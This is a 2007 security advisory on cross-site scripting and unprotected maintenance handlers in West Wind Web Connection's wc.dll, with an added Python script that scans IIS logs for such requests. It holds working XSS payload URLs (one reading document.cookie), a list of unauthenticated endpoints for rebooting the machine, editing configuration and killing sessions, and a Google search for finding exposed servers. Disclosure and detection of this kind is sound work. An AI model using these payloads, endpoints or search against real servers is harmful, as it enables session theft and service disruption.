[HSC] WCONNECT WC.DLL Cross-Site Scripting Vulnerability
HSC Research Group - Advisories
Written by Hackers Center   
Saturday, 15 December 2007 11:40

West Wind Web Connection is a tool for building Web applications using the Visual FoxPro environment, but it is also vulnerable to cross-site scripting attacks. Admins need to password-protect the application, since it is installed without a password by default. The code should also be sanitized to disallow XSS attacks or JavaScript.



Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz

Risk: Medium
Class: Cross Site Scripting
Remote: YES
Local: Yes


Vendor: West Wind Technologies http://www.west-wind.com
Product Version: All Versions



* Attackers can exploit these issues via a web client.



Examples:

/wc.dll?=%22%3E%3Cscript%3Ealert("Hello");%3C/script%3E
/wiki/wc.dll?AA~%22%3E%3Cscript%3Ealert("Hello");%3C/script%3E
/wc.dll?Wiki~Admin/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E


Remote Privilege Escalation (Password-Unprotected Application):


Log - /wc.dll?wwmaint~showlog
ISAPI Configuration - /wc.dll?_maintain~ShowStatus
DLL Error Log - /wc.dll?wwMaint~wcDLLErrorLog
Server Status - /wc.dll?wwMaint~ServerStatus
View of settings - /wc.dll?wwmaint~ShowStatus
Editing Config Files - /wc.dll?wwMaint~EditConfig
Reboot Machine - /wc.dll?wwMaint~RebootMachine
Restart IIS - /wc.dll?wwMaint~RebootMachine~&RestartOnly=On
Web Connection Kill - /wc.dll?wwmaint~sessions~KILL
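
To check a server for requests of the kinds listed above, the following added example (not part of the original advisory) scans IIS W3C log lines for wc.dll requests that carry markup in the query string or that reach the maintenance handlers. It assumes the log includes the cs-username field and that password protection is enforced through HTTP authentication, so an anonymous request shows "-" as the user; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Maintenance handler prefixes taken from the advisory's endpoint list.
MAINT_PREFIXES = ("wwmaint~", "_maintain~")
# Markup that has no business in a wc.dll query string.
MARKUP = re.compile(r"[<>\"]|javascript:", re.IGNORECASE)

def classify(row):
    """Return findings for one parsed log row (dict keyed by W3C field name)."""
    if not row.get("cs-uri-stem", "").lower().endswith("/wc.dll"):
        return []
    # Decode twice so double-encoded input (%253C) is also caught.
    query = unquote(unquote(row.get("cs-uri-query", "")))
    findings = []
    if MARKUP.search(query):
        findings.append("xss-markup")
    if query.lower().startswith(MAINT_PREFIXES):
        # Assumption: protection is HTTP auth, so "-" as user plus 2xx = unprotected.
        anonymous = row.get("cs-username", "-") == "-"
        served = row.get("sc-status", "").startswith("2")
        findings.append("maint-unprotected" if anonymous and served else "maint-request")
    return findings

def scan(lines):
    """Parse IIS W3C log lines via the #Fields header; return (c-ip, findings) hits."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            findings = classify(row)
            if findings:
                hits.append((row.get("c-ip"), findings))
    return hits

# Constructed sample log (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status",
    "2007-12-15 11:40:01 192.0.2.10 - GET /wc.dll =%22%3E%3Cscript%3Ealert(%22Hello%22);%3C/script%3E 200",
    "2007-12-15 11:40:09 192.0.2.10 - GET /wc.dll wwMaint~ShowStatus 200",
    "2007-12-15 11:41:30 198.51.100.7 admin GET /wc.dll wwMaint~EditConfig 200",
    "2007-12-15 11:42:02 203.0.113.5 - GET /wc.dll wwMaint~ServerStatus 401",
    "2007-12-15 11:43:00 203.0.113.5 - GET /wiki/wc.dll Wiki~Home 200",
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A "maint-unprotected" hit means a maintenance handler answered an anonymous request, which is the default-install condition the advisory tells admins to fix.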





Google Search:

http://www.google.com/search?q=ext%3Adll+inurl%3A%28wc%29&btnG=Search&hl=en

